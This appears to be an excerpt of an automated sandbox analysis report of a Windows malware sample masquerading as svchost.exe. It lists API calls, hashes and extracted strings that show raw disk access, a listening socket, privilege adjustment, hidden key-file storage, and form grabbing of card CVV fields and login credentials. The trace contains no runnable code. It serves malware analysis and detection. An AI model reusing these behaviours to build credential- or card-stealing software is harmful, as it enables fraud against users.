                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02CA3487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02CA34B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02CA34C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02CA34D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02CA34EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA3655), ref: 02CA3507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA3518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              • Opcode ID: e1a898401face07a1bacdcb4ea25fd137afd6e975340a97d268267fb0e6d3fde
                                                                                                                                                                                                              • Instruction ID: 4ffcb473597bf6e3485872a117efbc7bd25b4823e9cb7f57a4b71d3c9a2d65ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1a898401face07a1bacdcb4ea25fd137afd6e975340a97d268267fb0e6d3fde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41313271A82314BBE720AB59DC19FEE77AC9F41B18F404684F644AA0C0C7F05B848BE4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02CBDB7A
                                                                                                                                                                                                              • strchr.MSVCRT ref: 02CBDB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02CBDC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 02CBDC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 23527507-2295261572
                                                                                                                                                                                                              • Opcode ID: f4e72859521b0e19e18ea13b06c21f67ddfd05687a4a6b8b82c64cbe157a614d
                                                                                                                                                                                                              • Instruction ID: 67fc91f29415235b94a580fdb7a157158f9b41495979fdb0e11eb38c6e34c63e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e72859521b0e19e18ea13b06c21f67ddfd05687a4a6b8b82c64cbe157a614d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC418A319002599FEF268B24CC54BFAB7A1EF82305F1442E4DA8B97180D770AB45CF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              • API String ID: 776485234-1938657081
                                                                                                                                                                                                              • Opcode ID: 25ebcf98eca8f5be7aa9a842142bbfda73f58eedbfd3b33b9321df6f9c490eb9
                                                                                                                                                                                                              • Instruction ID: efd378ec2a5632892982f913e12adef7f8895fbf47b2a3f2f98b32b31a018930
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25ebcf98eca8f5be7aa9a842142bbfda73f58eedbfd3b33b9321df6f9c490eb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A01497268121839F2307E949C4BD77775CEF856A5741037DFA8796440F9906D00CAB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CC1278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02CC128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02CC12A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 02CC12B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 02CC12CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 02CC12D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4126956815-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CB2B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02CB2B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              • API String ID: 350293641-582869414
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CBE119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02CBE15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 02CBE1D2
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 02CBE1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2496910992-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C99EE8
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 02C99EF3
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 02C99EFE
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              • GetLastActivePopup.USER32(00000000), ref: 02C99F31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveLastPopup$IconicInfoLongVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3661365765-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02C9419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C941A0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C941B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C94224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C94235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94242
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C94245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02C9425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C94260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C94270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C9428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C942AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C942AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02C942DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C942DD
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C942F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C94346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9434D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C94365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02C9439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02C943B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C943C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C943DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C943DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C943EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C943ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C943F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C943FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C94409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(02C958F7,00000000,00000000,00000001), ref: 02C9446E
                                                                                                                                                                                                              • LockFile.KERNEL32(02C958F7,00000000,00000000,00000001,00000000), ref: 02C9447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(02C958F7,00000000,00000001,00000000,00000000), ref: 02C9448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(02C958F7,02C958F7,00000000,00000001,00000000), ref: 02C9449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C944AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C944AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C944BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C944BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c402d), ref: 02CB0857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB0895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB089F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB08A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB08B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB08C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CB08FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CB090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c402d,?,?), ref: 02CB0945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB0989
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB0991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB09A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB09A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CB09D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB0A00
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02CB0A65
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02CB0AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,02CDA5BC,00000002,?,?,?), ref: 02CB0AE7
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02CB0B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02CB0BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB0BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02CB0C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02CB0C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 02CB0C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 02CB0C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02CB0C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02CB0C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB0C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02CB0CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$a23c402d$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA89F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,02CA0BE3,?,?,?), ref: 02CA8A0F
                                                                                                                                                                                                                • Part of subcall function 02CA4170: GetProcessHeap.KERNEL32(00000008,00000016,75A8EA50,C:\Windows\apppatch\svchost.exe,02CB4A9E), ref: 02CA4181
                                                                                                                                                                                                                • Part of subcall function 02CA4170: HeapAlloc.KERNEL32(00000000), ref: 02CA4188
                                                                                                                                                                                                                • Part of subcall function 02CA4170: memset.MSVCRT ref: 02CA4198
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA8A35
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02CA8A44,?,?,?,?,?), ref: 02CAE433
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE441
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE44D
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE45B
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE467
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE479
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: strstr.MSVCRT ref: 02CAE48F
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: strstr.MSVCRT ref: 02CAE4A2
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02CAE50B
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB44DC
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB44EF
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB4502
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: PathAddBackslashA.SHLWAPI(02CED2A0), ref: 02CB4528
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: PathAddBackslashA.SHLWAPI(02CED2A0), ref: 02CB4562
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB45CD
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: GetLastError.KERNEL32 ref: 02CB45D7
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1A83
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1A92
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1AA1
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1ACD
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1B03
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB1B6C
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: GetLastError.KERNEL32 ref: 02CB1B76
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: IsUserAnAdmin.SHELL32 ref: 02CB1B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02CA8A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02CA8A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?,?,?,?,?), ref: 02CA8A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,A23C419D,?,?,?,?,?,?), ref: 02CA8AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?,?,?,?,?), ref: 02CA8ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02CA8B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af,?,?,?,?,?,?), ref: 02CA8B5D
